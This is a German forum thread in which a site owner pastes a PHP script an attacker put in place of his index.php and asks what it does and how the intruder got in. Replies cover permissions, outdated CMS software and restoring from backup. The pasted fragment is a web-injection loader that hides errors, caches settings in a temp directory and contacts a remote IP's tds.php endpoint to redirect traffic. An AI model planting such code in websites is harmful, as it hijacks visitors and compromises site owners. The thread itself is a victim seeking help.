Domain gehackt ?!

Computer: Software & Programmierung PHP
#1

Hallo,

hatte einen Angriff auf eine meiner Domains (Linux Server mit OPEN-Suse 10.3 Serversoftware). Die index.php wurde gegen eine NEUE index.php ausgetauscht. Am Ende werde ich ich das Script einfügen! Kann mir jemand „GENAU“!!! erklären was dieses Script macht, denn alles kann ich nicht interpretieren. Mein Server hat ein 16stelliges Passwort, die Domain ein 14stelliges FTP-Passwort. Beide wurden auch inzwischen geändert. Wie ist DER/DIE da reingekommen???
Und bitte, dass niemand antwortet, der zuspät antwortet, weil er bei Mutti essen war und sowieso keine Ahnung hat!? (ALLES schon vorgekommen - reichlich)!

Hier das Hacker-SCRIPT:

<?php ini_set('display_errors',0);
if(!function\_exists('sys\_get\_temp\_dir')) {function sys\_get\_temp\_dir() {if(!empty($\_ENV['TMP'])) {return realpath($\_ENV['TMP']);} if(!empty($\_ENV['TMPDIR'])) {return realpath($\_ENV['TMPDIR']);} if(!empty($\_ENV['TEMP'])) {return realpath($\_ENV['TEMP']);} $tempfile=tempnam(\_\_FILE\_\_,''); if(file\_exists($tempfile)) {unlink($tempfile); return realpath(dirname($tempfile));}return null;}} $geturl='[http://188.190.124.81/tds.php](http://188.190.124.81/tds.php)'; $timeout=180;$default\_url='[http://www.google.com/robots.txt](http://www.google.com/robots.txt)'; if(!$geturl)exit(); $base=ini\_get('upload\_tmp\_dir'); if($base==null)$base=sys\_get\_temp\_dir(); $tmp\_settings=$base."/settings.json"; $settings=file\_exists($tmp\_settings)?unserialize(file\_get\_contents($tmp\_settings)):array('last'=\>0,'url'=\>$default\_url); if($settings['last'] SCRIPT-ENDE. Ich hoffe... MacFlie
#2

Hallo,
man bräuchte ein paar mehr Infos.
Hatte die Datei evtl. chmod 777 rechte ???
Dann können die PWS noch so lange sein.
Haben Sie z.B. Joomla als CMS am laufen ??? Joomla verbirkt viele Lücken die von Hackern ausgenutzt werden… mehr Infos.

#3

Hallo,

die Domain bzw. die index-Datei hat für „alle lesen“ und Eigentümer „schreiben“. Weiß jetzt nicht was das in in ZahlenCode ist.

#4

Hallo,

du musst die Passwörter austauschen, denn so sind die an dein FTP Konto rangekommen- Irgendwie konnten die deine Zugangsdaten herausfinden, also absichern. Wenn es ein CMS ist, Updates durchführen und Sicherheitslücken schließen. Wenn du ein altes CMS wie Joomla 1.5 hast, dann ist es ein Paradies für Hacker. Also neues CMS.

Viele Grüße

Paul

#5

Hallo,

die Passwörter wurden natürliche geändert, wie schon geschrieben. Ich setze überhaupt kein CMS ein!

MacFlie

#6

Hallo,

irgendwo hast du auf jeden Fall eine Sicherheitslücke in deinen Webseitendaten, ob es nun ein CMS ist oder nicht. Es werden meisten versteckte Scripte eingebaut, die du nicht siehst. Meine Empfehlung wäre, auf ein anderes System umzusteigen. Auch wenn du jetzt die passwörter geändert hast, nützt es wenig, wenn das Script noch eingebaut ist. Wenn du ein Backup von der Seite hast (sollte man in der Regel haben) dann lösche die Webinhalte auf dem Server und spiel neu auf.

Viel grüße

Eisen

#7

Hallo,

das Script ist völlig aus der Seite entfernt und natürlich hab ich immer eine aktuelle Version parat.
Doch die Frage war auch „Was macht das Script?“, außer auf eine andere Seite umzuleiten? -> ‚http://188.190.124.81/tds.php‘. Und wieso steht als default ($default_url='http://www.google.com/robots.txt’) diese Google-Adresse?
Die obere IP, zu der umgeleitet werden soll, ist nie zu erreichen. Wie bekommt man raus woher die stammt?

MacFlie

#8

Hallo,

sorry, leider keine Ahnung.